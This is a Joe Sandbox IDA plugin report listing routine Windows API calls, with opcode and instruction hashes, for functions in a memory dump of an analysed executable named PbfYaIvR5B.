                                                                                                                    • GetCPInfo.KERNEL32(00000000,0006BA89,?,?,?,0006BA89,?,00000000), ref: 0006BC77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 546120528-0
                                                                                                                    • Opcode ID: 07856abccbd88bb9ce459606d0654b797daaae166c13e5e07a1048f29e5c6638
                                                                                                                    • Instruction ID: 265cc415345b892979cc566568b647d8f0714b49b62c8cb0727bbdee2caa0cd5
                                                                                                                    • Opcode Fuzzy Hash: 07856abccbd88bb9ce459606d0654b797daaae166c13e5e07a1048f29e5c6638
                                                                                                                    • Instruction Fuzzy Hash: DA5105B1D042459EDB209F75C8816FABBE6EF41310F14447ED496CF252EB399A85CB90
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00049A50,?,?,00000000,?,?,00048CBC,?), ref: 00049BAB
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00048411,-00009570,00000000,000007F3), ref: 00049BB6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    • Opcode ID: ba6a4bf99245bb37aea3a9fb7a1a6fcf5220efb3314257bfa415192ae3c1f0e1
                                                                                                                    • Instruction ID: 43d3c11471cd748909e88714b44ede1c7ae79adc5f544974763925369d59e6fe
                                                                                                                    • Opcode Fuzzy Hash: ba6a4bf99245bb37aea3a9fb7a1a6fcf5220efb3314257bfa415192ae3c1f0e1
                                                                                                                    • Instruction Fuzzy Hash: F541DFB0A043018FEB24DF15E68486BB7E6FFD4320F158A3DE88583261D774ED458ADA
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 000697E5: GetLastError.KERNEL32(?,00081030,00064674,00081030,?,?,00063F73,00000050,?,00081030,00000200), ref: 000697E9
                                                                                                                      • Part of subcall function 000697E5: _free.LIBCMT ref: 0006981C
                                                                                                                      • Part of subcall function 000697E5: SetLastError.KERNEL32(00000000,?,00081030,00000200), ref: 0006985D
                                                                                                                      • Part of subcall function 000697E5: _abort.LIBCMT ref: 00069863
                                                                                                                      • Part of subcall function 0006BB4E: _abort.LIBCMT ref: 0006BB80
                                                                                                                      • Part of subcall function 0006BB4E: _free.LIBCMT ref: 0006BBB4
                                                                                                                      • Part of subcall function 0006B7BB: GetOEMCP.KERNEL32(00000000,?,?,0006BA44,?), ref: 0006B7E6
                                                                                                                    • _free.LIBCMT ref: 0006BA9F
                                                                                                                    • _free.LIBCMT ref: 0006BAD5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2991157371-0
                                                                                                                    • Opcode ID: 27b42ba5a761508c1506cba0af3d8171cc5710f56598d79db90b6806264a6c20
                                                                                                                    • Instruction ID: a0092e38e730e3907828d1092ffb39671f1bc5886d4ec9c26d1ca672ec996e65
                                                                                                                    • Opcode Fuzzy Hash: 27b42ba5a761508c1506cba0af3d8171cc5710f56598d79db90b6806264a6c20
                                                                                                                    • Instruction Fuzzy Hash: AA31E571904209AFDB10EFA8D841BADB7F7EF40324F214199E904DB2A3EB765D80DB51
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00041E55
                                                                                                                      • Part of subcall function 00043BBA: __EH_prolog.LIBCMT ref: 00043BBF
                                                                                                                    • _wcslen.LIBCMT ref: 00041EFD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2838827086-0
                                                                                                                    • Opcode ID: e783302ddfd24a4fdc98f2f7f6095ec2d1389e1cd5c43c5c716bca7d196d4257
                                                                                                                    • Instruction ID: 4db98c54e8988c8aedc0f04045e652034b864fc702c2b5b90b0dfe598feaf5a7
                                                                                                                    • Opcode Fuzzy Hash: e783302ddfd24a4fdc98f2f7f6095ec2d1389e1cd5c43c5c716bca7d196d4257
                                                                                                                    • Instruction Fuzzy Hash: AC315AB5904209AFCF15DF99C945AEEFBF6AF48300F1040AAF845A7252CB365E45CB68
                                                                                                                    APIs
                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000473BC,?,?,?,00000000), ref: 00049DBC
                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00049E70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1392018926-0
                                                                                                                    • Opcode ID: 6d9e68e358630e8281e2c0585dfe8b28cc67b932ca843af2bcce249cb51679b3
                                                                                                                    • Instruction ID: a30490222373c274ca759d12a2aa04fed53bc53501cb22497938612e8b52cbd7
                                                                                                                    • Opcode Fuzzy Hash: 6d9e68e358630e8281e2c0585dfe8b28cc67b932ca843af2bcce249cb51679b3
                                                                                                                    • Instruction Fuzzy Hash: 1821F372648245AFD714CF35C891AABBBE8AF55304F08493CF8C587141D339EA0CDBA5
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00049F27,?,?,0004771A), ref: 000496E6
                                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00049F27,?,?,0004771A), ref: 00049716
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: f24f6695be205f178172ec74e252530a0afc3eec5f8f31ec2bb8e45c5ace8b0e
                                                                                                                    • Instruction ID: ade871bc857928ef826ab9b0d090dc6ba37c49ed2989aa3b0c5ec3258330c023
                                                                                                                    • Opcode Fuzzy Hash: f24f6695be205f178172ec74e252530a0afc3eec5f8f31ec2bb8e45c5ace8b0e
                                                                                                                    • Instruction Fuzzy Hash: 0F21C1B15043446FE3708A65CC89FE7B7DCEB49321F010A39F9D5C21D2C7B8A8849A71
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00049EC7
                                                                                                                    • GetLastError.KERNEL32 ref: 00049ED4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    • Opcode ID: c65ff05251547c93755805c9addbb7c4d7f4b288e06e7be1bf4ac4d4e0d49ee7
                                                                                                                    • Instruction ID: b718b35fd92e35c514ff1ac9bb931b4f0143a7a467fe0598f5990b703fe5c48a
                                                                                                                    • Opcode Fuzzy Hash: c65ff05251547c93755805c9addbb7c4d7f4b288e06e7be1bf4ac4d4e0d49ee7
                                                                                                                    • Instruction Fuzzy Hash: 8711E5B0A00700ABE734D629CC44BABB7E8AF45360F604A39E153D26D1D7B4ED49D764
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00068E75
                                                                                                                      • Part of subcall function 00068E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006CA2C,00000000,?,00066CBE,?,00000008,?,000691E0,?,?,?), ref: 00068E38
                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00081098,000417CE,?,?,00000007,?,?,?,000413D6,?,00000000), ref: 00068EB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2447670028-0
                                                                                                                    • Opcode ID: f6dbf45488e4d3ffd167e21821be0227497d954ed8ab7fb31d04ed64564c64f1
                                                                                                                    • Instruction ID: 8d73fdf587c9018e125c656b45fcb25a19d87cd248add949cda3c50838002410
                                                                                                                    • Opcode Fuzzy Hash: f6dbf45488e4d3ffd167e21821be0227497d954ed8ab7fb31d04ed64564c64f1
                                                                                                                    • Instruction Fuzzy Hash: 19F0F6326011116ADB312A259C04BAF379F8FD2B70F25C326F818AA192DF77CD0083A0
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 000510AB
                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 000510B2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1231390398-0
                                                                                                                    • Opcode ID: a59dbd8bb86f3548ce6cf603b559703d8bcbbd5f0c9382ffa3cfb2307b1b4a1b
                                                                                                                    • Instruction ID: b9d32bf2f922e3325e4e1f208c921f774b2e1d44c2956b2dab44fb2a50910d69
                                                                                                                    • Opcode Fuzzy Hash: a59dbd8bb86f3548ce6cf603b559703d8bcbbd5f0c9382ffa3cfb2307b1b4a1b
                                                                                                                    • Instruction Fuzzy Hash: 7AE0D832F10155A7DF0D87B49C15AEFB3DDEB442093145275E803E3141F9B8DE8546E0
                                                                                                                    APIs
                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004A325,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A501
                                                                                                                      • Part of subcall function 0004BB03: _wcslen.LIBCMT ref: 0004BB27
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004A325,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A532
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    • Opcode ID: 8f329da50211005a173c233128aa7ed4e41c10b9885951d8c7b4bec148f4733a
                                                                                                                    • Instruction ID: 0eeeac95467de49e61e2b09a3ac20ad00d15b1d7425882454f63f57d7d0ee507
                                                                                                                    • Opcode Fuzzy Hash: 8f329da50211005a173c233128aa7ed4e41c10b9885951d8c7b4bec148f4733a
                                                                                                                    • Instruction Fuzzy Hash: 4BF0A932240209BBEF016F60DC01FDA3BACAB04385F488061BC48E6160DB75DAE8EB90
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0004977F,?,?,000495CF,?,?,?,?,?,00072641,000000FF), ref: 0004A1F1
                                                                                                                      • Part of subcall function 0004BB03: _wcslen.LIBCMT ref: 0004BB27
                                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0004977F,?,?,000495CF,?,?,?,?,?,00072641), ref: 0004A21F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2643169976-0
                                                                                                                    • Opcode ID: 12f00d096df215425192e9ca6bd71d00be468b6e2378f601d528b801f64bb4f3
                                                                                                                    • Instruction ID: ca2d09e147f0372eac88573a023da3ee026b9ca1ca109dda61d5d1620cec9b0e
                                                                                                                    • Opcode Fuzzy Hash: 12f00d096df215425192e9ca6bd71d00be468b6e2378f601d528b801f64bb4f3
                                                                                                                    • Instruction Fuzzy Hash: 20E092726402097BEB015F64DC45FDA379CBB08382F484071B948E2051EBA5DEC4EA94
                                                                                                                    APIs
                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00072641,000000FF), ref: 0005ACB0
                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00072641,000000FF), ref: 0005ACB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3856339756-0
                                                                                                                    • Opcode ID: 809eb9d3dc8408920eff998953c5de3fbde0f2b9792303f1c6b6304f4f00c37e
                                                                                                                    • Instruction ID: 6c3ad45b28ab8740f6a5fcfe1c241a928d1bda4a78629a8ea836f4720bbd834f
                                                                                                                    • Opcode Fuzzy Hash: 809eb9d3dc8408920eff998953c5de3fbde0f2b9792303f1c6b6304f4f00c37e
                                                                                                                    • Instruction Fuzzy Hash: B6E06572504650EFDB109B58DC06B46FBA8FB48B20F104266F416D3761CB786941CB94
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0004A23A,?,0004755C,?,?,?,?), ref: 0004A254
                                                                                                                      • Part of subcall function 0004BB03: _wcslen.LIBCMT ref: 0004BB27
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0004A23A,?,0004755C,?,?,?,?), ref: 0004A280
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    • Opcode ID: 4ba7e7d9dc9fce48419ba99e84659f7f4a52fc585c3aa024faa942f13b01e453
                                                                                                                    • Instruction ID: dda8cb81007e3b8d5d296c50b0a0fe940878940266eca8cbb97e27929b59c07a
                                                                                                                    • Opcode Fuzzy Hash: 4ba7e7d9dc9fce48419ba99e84659f7f4a52fc585c3aa024faa942f13b01e453
                                                                                                                    • Instruction Fuzzy Hash: 75E092719001245BDB50BB68CC05BD97B98AB093E2F044271FD88E3191D7B8DE84DAE4
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 0005DEEC
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0005DF03
                                                                                                                      • Part of subcall function 0005B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005B579
                                                                                                                      • Part of subcall function 0005B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005B58A
                                                                                                                      • Part of subcall function 0005B568: IsDialogMessageW.USER32(00010458,?), ref: 0005B59E
                                                                                                                      • Part of subcall function 0005B568: TranslateMessage.USER32(?), ref: 0005B5AC
                                                                                                                      • Part of subcall function 0005B568: DispatchMessageW.USER32(?), ref: 0005B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2718869927-0
                                                                                                                    • Opcode ID: 89d963c8ef0667c53f1333b9e65fa36d8f6bf42bc22bd2856e5f6dacaa2defaf
                                                                                                                    • Instruction ID: 42d8c11485fb6b677205d1874306eda5666795cff59097890398ff2b366ebe25
                                                                                                                    • Opcode Fuzzy Hash: 89d963c8ef0667c53f1333b9e65fa36d8f6bf42bc22bd2856e5f6dacaa2defaf
                                                                                                                    • Instruction Fuzzy Hash: 17E092F240028826EF02AB60DC06FEF3B6C6B05786F444861B640DA0A3EA78EA158765
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00050836
                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0004F2D8,Crypt32.dll,00000000,0004F35C,?,?,0004F33E,?,?,?), ref: 00050858
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1175261203-0
                                                                                                                    • Opcode ID: e959edfae8fb503e5ec70f013543afd69e4ae7798e27acdd07f2a7dea0ac1a70
                                                                                                                    • Instruction ID: 6448347160b40d6c259c2d34a59921a08a23daeae74e8d23f50199ddb898fd03
                                                                                                                    • Opcode Fuzzy Hash: e959edfae8fb503e5ec70f013543afd69e4ae7798e27acdd07f2a7dea0ac1a70
                                                                                                                    • Instruction Fuzzy Hash: 60E012768002686AEB11AB94DC05FDB7BACAF09392F0440657A49E2005DA78DA848AE0
                                                                                                                    APIs
                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0005A3DA
                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0005A3E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1918208029-0
                                                                                                                    • Opcode ID: f041c2704d4734ba7edc5a197d367499754cf116ef8194332f9b705bb4111df9
                                                                                                                    • Instruction ID: 54e484aa9828298766b4295aeddc36874c3d7ca8d5632e1237fcd1bfe1018e11
                                                                                                                    • Opcode Fuzzy Hash: f041c2704d4734ba7edc5a197d367499754cf116ef8194332f9b705bb4111df9
                                                                                                                    • Instruction Fuzzy Hash: 89E0ED71904218EBDB54DF59C5416DEBBE8EB05366F10C05AE88697201E374AF08DB91
                                                                                                                    APIs
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00062BAA
                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00062BB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1660781231-0
                                                                                                                    • Opcode ID: caaace9453ea1a0b380b0f445ac09ebf0b55ef59e0cb8d6a7bfc8a1774e3b96c
                                                                                                                    • Instruction ID: 3df0e892f6e803ad2ab76af8d92d2c252f6a64ecbb2e238cc58a4de1234da96d
                                                                                                                    • Opcode Fuzzy Hash: caaace9453ea1a0b380b0f445ac09ebf0b55ef59e0cb8d6a7bfc8a1774e3b96c
                                                                                                                    • Instruction Fuzzy Hash: 4DD02238658F00189C686EB43C038C83387EF42B76BA076DAF420998C3EF549080A112
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3351165006-0
                                                                                                                    • Opcode ID: 2cf43cb8017a1e0bd6bc2e0dd4119d1c06ed9293908750535ffa55a275c6fd74
                                                                                                                    • Instruction ID: 9b8d1548c7f77c70f273b318450313d341c9d43da577a10e5cb89eb1e3e11a62
                                                                                                                    • Opcode Fuzzy Hash: 2cf43cb8017a1e0bd6bc2e0dd4119d1c06ed9293908750535ffa55a275c6fd74
                                                                                                                    • Instruction Fuzzy Hash: B3C0123205C600BEDB010BB4DC0AC2BBBA8ABA6312F04C908B0A5C0060C33CC110DB11
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: b7d0446fbb998fffe1311fc95871f206163130a2cc12aa888cb0fa04e335eab4
                                                                                                                    • Instruction ID: 180a39b0c9550388c9f86a491d95fa1d33201a6f62a1198c213e2215befe4b15
                                                                                                                    • Opcode Fuzzy Hash: b7d0446fbb998fffe1311fc95871f206163130a2cc12aa888cb0fa04e335eab4
                                                                                                                    • Instruction Fuzzy Hash: ABC1B1B0A002549FEF65CF68C884BE97BE5EF09310F0801B9EC559B287DB3499C4CBA5
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: fd39b8e864e7c7d0337b7a430593cc700ac002ae356c00dd98e0c64fd156ba46
                                                                                                                    • Instruction ID: 6fb61b15fadd67f4ce6a1f4543a5a0fc098791d370aa239fead1c0afe1feee0a
                                                                                                                    • Opcode Fuzzy Hash: fd39b8e864e7c7d0337b7a430593cc700ac002ae356c00dd98e0c64fd156ba46
                                                                                                                    • Instruction Fuzzy Hash: 7A71F4B1500B449EDB35DB70C8519EBB7E9AF15301F40183EF5AB87242DA327688CF15
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00048289
                                                                                                                      • Part of subcall function 000413DC: __EH_prolog.LIBCMT ref: 000413E1
                                                                                                                      • Part of subcall function 0004A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2506663941-0
                                                                                                                    • Opcode ID: 8c6573517bf374fe8f72b1749fed7d5f77eb08a8aa4c8e8cc1c3833e4e35bb89
                                                                                                                    • Instruction ID: 0dfd95d07f50960ccd5c24b68fa6131089db2cc8aadb541dce9366d8f67ed859
                                                                                                                    • Opcode Fuzzy Hash: 8c6573517bf374fe8f72b1749fed7d5f77eb08a8aa4c8e8cc1c3833e4e35bb89
                                                                                                                    • Instruction Fuzzy Hash: 9141C9B19446589ADB24EB60CC55BEEB7B8AF00304F4444FBE58A57083EB755FC9CB14
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 000413E1
                                                                                                                      • Part of subcall function 00045E37: __EH_prolog.LIBCMT ref: 00045E3C
                                                                                                                      • Part of subcall function 0004CE40: __EH_prolog.LIBCMT ref: 0004CE45
                                                                                                                      • Part of subcall function 0004B505: __EH_prolog.LIBCMT ref: 0004B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: f9a97aeb03c15f879fa88c7b2649f4b8cf562f1f3d1d28419b38c5df31ec25a0
                                                                                                                    • Instruction ID: 58adc8a35d926a66d112957bd70df8796b4cd02edc5b677ee1e2f05400a02a67
                                                                                                                    • Opcode Fuzzy Hash: f9a97aeb03c15f879fa88c7b2649f4b8cf562f1f3d1d28419b38c5df31ec25a0
                                                                                                                    • Instruction Fuzzy Hash: 264134B0905B419EE724DF398885AE7FAE5BF19300F50493EE5FE83282CB316654CB14
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 000413E1
                                                                                                                      • Part of subcall function 00045E37: __EH_prolog.LIBCMT ref: 00045E3C
                                                                                                                      • Part of subcall function 0004CE40: __EH_prolog.LIBCMT ref: 0004CE45
                                                                                                                      • Part of subcall function 0004B505: __EH_prolog.LIBCMT ref: 0004B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
